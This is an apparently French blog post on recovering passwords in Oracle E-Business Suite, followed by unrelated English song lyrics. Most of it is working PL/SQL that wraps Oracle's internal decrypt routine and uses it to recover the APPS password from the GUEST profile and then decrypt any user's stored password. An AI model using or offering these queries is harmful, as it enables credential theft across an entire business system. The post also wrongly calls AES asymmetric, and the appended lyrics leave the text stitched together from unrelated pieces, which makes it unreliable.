Mot de passe dans Oebs

Comment récupérer son mot de passe perdu ?

Est-il de règle de commencer par cette phrase lorsqu'on parle de récupérer un mot de passe, afin de montrer que cette connaissance n'implique pas forcément la volonté de récupérer des mots de passe de manière intrusive ?

Je me suis posé cette question sachant que ce moyen existait et ayant quelques notions de cryptographie, qualité toutefois non nécessaire pour effectuer ces tâches de récupération. Il est néanmoins nécessaire de disposer d'un certain nombre d'éléments.

Les éléments ci-dessous se basent essentiellement sur un note trouvée ici. Notons que cette note date de 2006 et qu'elle est toujours valable à quelques détails prêts.

1 - Faire un PKG ou une fonction sur compte APPS

CREATE OR REPLACE PACKAGE XX_TEST_MDP
    AS
       FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
          RETURN VARCHAR2;
    END XX_TEST_MDP;
    /
    
    CREATE OR REPLACE PACKAGE BODY XX_TEST_MDP
    AS
       FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
          RETURN VARCHAR2
       AS
          LANGUAGE JAVA
          NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
    END XX_TEST_MDP;

2 - Obtenir le mot de passe APPS à partir du compte GUEST

SELECT a.user_name,(
      SELECT XX_TEST_MDP.decrypt(
                                     ((SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual))
                                    ,a.encrypted_foundation_password)
      FROM dual
      ) AS apps_password
FROM  fnd_user a
WHERE  a.user_name LIKE upper(
    (SELECT
          substr(fnd_profile.value('GUEST_USER_PWD'),1,instr(fnd_profile.value('GUEST_USER_PWD'),'/')-1)
           FROM dual)
     );

3- Obtenir mot de passe d'un utilisateur TOTO

SELECT   fnd_user.user_name,
           XX_TEST_MDP.decrypt
              (:mdp_apps,  fnd_user.encrypted_user_password ) decrypted_user_password
      FROM fnd_user
      WHERE user_name = 'TOTO'
  ORDER BY fnd_user.user_name;

4 - Moyen détourné d'avoir APPS (en ayant connaissance d'un utilisateur lambda)

Remarquons que la clef de cryptage est constituée du nom utilisateur et de son mot de passe...

SELECT a.user_name,(
      XX_TEST_MDP.decrypt(
                                     ((a.user_name||'/:mdp_lambda))
                                    ,a.encrypted_foundation_password)
      ) apps_password
FROM  fnd_user a
WHERE   a.user_name = 'Lambda';

Les données cryptées dans la table FND_USER ressemblent à quelques chose comme cela :

ZGFB66A8F502A7C5E5B672D32264987F1EE4B4FDC791AE838B3972DD5A200E8B5B53A9A20F01D1B4CBD870F8DF16E43F3456

Il est possible de construire (comme c'est fait par exemple ici)  ses propres fonctions d'encryptage.

Signalons aussi que le DES est considéré dépassé, et qu'Oracle applications utilise vraisemblablement le triple DES (cf. quelques copies d'écran ci-dessous, quelque amateur averti pourra s'amuser à le vérifier et à trouver la méthode de cryptage à partir des données ci-dessus récupérées). Dans ce type d'algorithme, les données entrées sont mélangées à celles d'une clef (processus itératif d'additions, de découpage et de collage répétés dit à clef symétrique car la même clef est utilisée au décodage qu'au codage, le processus de décodage consistant à "détricoter" (à effectuer la même série d'opération en sens inverse). Un chiffrage asymétrique comme AES utilise une clef de chiffrage différente de la clef de déchiffrage.

What would you do if I sang out of tune,
Would you stand up and walk out on me.
Lend me your ears and I'll sing you a song,
And I'll try not to sing out of key.